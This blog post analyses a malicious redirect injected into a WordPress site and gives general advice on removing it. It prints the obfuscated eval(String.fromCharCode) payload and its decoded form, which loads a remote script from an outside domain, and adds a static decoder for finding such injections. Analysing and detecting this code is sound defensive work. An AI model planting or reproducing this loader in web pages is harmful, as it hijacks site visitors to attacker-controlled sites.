Yesterday in a group, I saw a webmaster asking about a WordPress-built website that automatically redirects to someone else's site as soon as it's opened. Naiba then visited the URL he had sent by private message to take a look.
WordPress infected with malicious redirect code
When you open the website, most of the content loads and then the page automatically redirects to a third-party website, passing through several sites in a row. The site it lands on also asks you to grant it notification permissions, as shown in the image below:

Naiba then analyzed the website's source code (many plugins were installed, so there was a lot of JS and other code, which made it messy). In the end, the following piece of code stood out as abnormal. When asked, the webmaster said it was neither his own nor from the plugins he had installed.
<script>eval(String.fromCharCode(118, 97, 114, 32, 100, 61, 100, 111, 99, 117, 109, 101, 110, 116, 59, 118, 97, 114, 32, 115, 61, 100, 46, 99, 114, 101, 97, 116, 101, 69, 108, 101, 109, 101, 110, 116, 40, 39, 115, 99, 114, 105, 112, 116, 39, 41, 59, 32, 10, 115, 46, 116, 121, 112, 101, 61, 39, 116, 101, 120, 116, 47, 106, 97, 118, 97, 115, 99, 114, 105, 112, 116, 39, 59, 10, 115, 46, 97, 115, 121, 110, 99, 61, 116, 114, 117, 101, 59, 10, 118, 97, 114, 32, 112, 108, 32, 61, 32, 83, 116, 114, 105, 110, 103, 46, 102, 114, 111, 109, 67, 104, 97, 114, 67, 111, 100, 101, 40, 49, 48, 52, 44, 32, 49, 49, 54, 44, 32, 49, 49, 54, 44, 32, 49, 49, 50, 44, 32, 49, 49, 53, 44, 32, 53, 56, 44, 32, 52, 55, 44, 32, 52, 55, 44, 32, 57, 56, 44, 32, 49, 48, 56, 44, 32, 57, 55, 44, 32, 57, 57, 44, 32, 49, 48, 55, 44, 32, 57, 55, 44, 32, 49, 49, 57, 44, 32, 57, 55, 44, 32, 49, 49, 52, 44, 32, 49, 48, 48, 44, 32, 57, 55, 44, 32, 49, 48, 51, 44, 32, 49, 49, 49, 44, 32, 52, 54, 44, 32, 57, 57, 44, 32, 49, 49, 49, 44, 32, 49, 48, 57, 41, 59, 10, 115, 46, 115, 114, 99, 61, 112, 108, 43, 39, 47, 115, 116, 97, 116, 46, 106, 115, 63, 108, 61, 49, 49, 38, 39, 59, 32, 10, 105, 102, 32, 40, 100, 111, 99, 117, 109, 101, 110, 116, 46, 99, 117, 114, 114, 101, 110, 116, 83, 99, 114, 105, 112, 116, 41, 32, 123, 32, 10, 100, 111, 99, 117, 109, 101, 110, 116, 46, 99, 117, 114, 114, 101, 110, 116, 83, 99, 114, 105, 112, 116, 46, 112, 97, 114, 101, 110, 116, 78, 111, 100, 101, 46, 105, 110, 115, 101, 114, 116, 66, 101, 102, 111, 114, 101, 40, 115, 44, 32, 100, 111, 99, 117, 109, 101, 110, 116, 46, 99, 117, 114, 114, 101, 110, 116, 83, 99, 114, 105, 112, 116, 41, 59, 10, 125, 32, 101, 108, 115, 101, 32, 123, 10, 100, 46, 103, 101, 116, 69, 108, 101, 109, 101, 110, 116, 115, 66, 121, 84, 97, 103, 78, 97, 109, 101, 40, 39, 104, 101, 97, 100, 39, 41, 91, 48, 93, 46, 97, 112, 112, 101, 110, 100, 67, 104, 105, 108, 100, 40, 115, 41, 59, 10, 125));</script>
Naiba then searched for eval(String.fromCharCode and found the following write-up:
Record - Website HACKED!
That article is on jdstiles.com, and it explains the meaning of the code above:
var d=document;var s=d.createElement('script');
s.type='text/javascript';
s.async=true;
var pl = String.fromCharCode(104, 116, 116, 112, 115, 58, 47, 47, 98, 108, 97, 99, 107, 97, 119, 97, 114, 100, 97, 103, 111, 46, 99, 111, 109);
s.src=pl+'/stat.js?l=11&';
if (document.currentScript) {
document.currentScript.parentNode.insertBefore(s, document.currentScript);
} else {
d.getElementsByTagName('head')[0].appendChild(s);
}
Decoding the numbers in the inner String.fromCharCode call in the same way reveals the following website.
https://blackawardago.com
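The two-layer decoding described above can be done without ever running the payload. The following is an added example, not code from the original post or from jdstiles.com: it statically unwraps nested String.fromCharCode(...) calls and never calls eval(). The sample input is constructed, and loader.example is a placeholder domain.

```javascript
// Added example: statically unwrap nested String.fromCharCode(...) layers.
// Nothing here calls eval(); the payload is only ever treated as text.
const CHARCODE_CALL = /String\.fromCharCode\(([\d\s,]+)\)/g;
const URL_PATTERN = /https?:\/\/[^\s'"<>)]+/g;

// Turn an argument list such as "118, 97, 114" into the text it encodes.
function decodeArgs(args) {
  const codes = args.split(',')
    .map((n) => Number.parseInt(n, 10))
    .filter(Number.isInteger);
  return codes.map((c) => String.fromCharCode(c)).join('');
}

// Decode every call found in `source`, then rescan each decoded string,
// because the injected script hides the loader URL in a second layer.
function unwrapCharCodes(source, maxDepth = 5) {
  const layers = [];
  let pending = [source];
  for (let depth = 1; depth <= maxDepth && pending.length > 0; depth++) {
    const next = [];
    for (const text of pending) {
      for (const match of text.matchAll(CHARCODE_CALL)) {
        const value = decodeArgs(match[1]);
        layers.push({ depth, value });
        next.push(value);
      }
    }
    pending = next;
  }
  return layers;
}

// Collect the distinct URLs that appear in any decoded layer.
function extractUrls(layers) {
  const urls = layers.flatMap((l) => l.value.match(URL_PATTERN) || []);
  return [...new Set(urls)];
}

// Constructed sample with the same two-layer shape as the script above;
// loader.example is a placeholder domain, not one taken from the page.
const encode = (s) => Array.from(s, (c) => c.charCodeAt(0)).join(', ');
const SAMPLE_INNER = "var pl = String.fromCharCode(" +
  encode('https://loader.example') + ");\ns.src=pl+'/stat.js?l=11&';";
const SAMPLE_PAGE = '<script>eval(String.fromCharCode(' +
  encode(SAMPLE_INNER) + '));</script>';

const sampleLayers = unwrapCharCodes(SAMPLE_PAGE);
console.log(sampleLayers, extractUrls(sampleLayers));
```

The same functions can be run over the text of theme files or a database export when checking for further copies of the injection.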
Regardless of the final URL that appears, it's clear that the website has been hacked. This is known abroad as WordPress malicious redirect code, which seems to have become popular around 2018. Below are two articles Naiba found while researching.
https://www.getastra.com/e/malware/infections/wordpress-redirect-hack-js_charcode_voip_ad-malware
https://stackoverflow.com/questions/52282559/how-to-delete-script-injected-on-wordpress-site-ads-voipnewswire-net
If you want to check whether your website is also infected with this malicious redirect code, you can use the following website to inspect it.
https://sitecheck.sucuri.net/
WordPress Malicious Redirect Code Removal Methods
So if a site is infected with WordPress malicious redirect code, how can it be removed? (Since that site owner didn't ask for my help, Naiba hasn't encountered the actual code. The following are general handling methods.)
Solution for those who can understand code
- Find the malicious code and delete it.
- Check all website files and code to see if there are any other infections or unknown scripts, and delete them.
- Check if the database is infected; if so, delete the infected content.
Solution for those who cannot understand code
- Pay someone who understands code to clean it for you. I saw the foreign service above starts at $108/year.
- Delete the website and reinstall it, ensuring the use of secure themes and plugins, ensuring the database is not infected, and ensuring server security.
If any experts reading this article know how to clean such malicious code or have experience cleaning malicious code, please leave a comment to share.
Finally, a plugin recommendation:
Install a firewall for WordPress! Try Wordfence
Related knowledge:
Implement Security Measures to Avoid WordPress Websites Being Hacked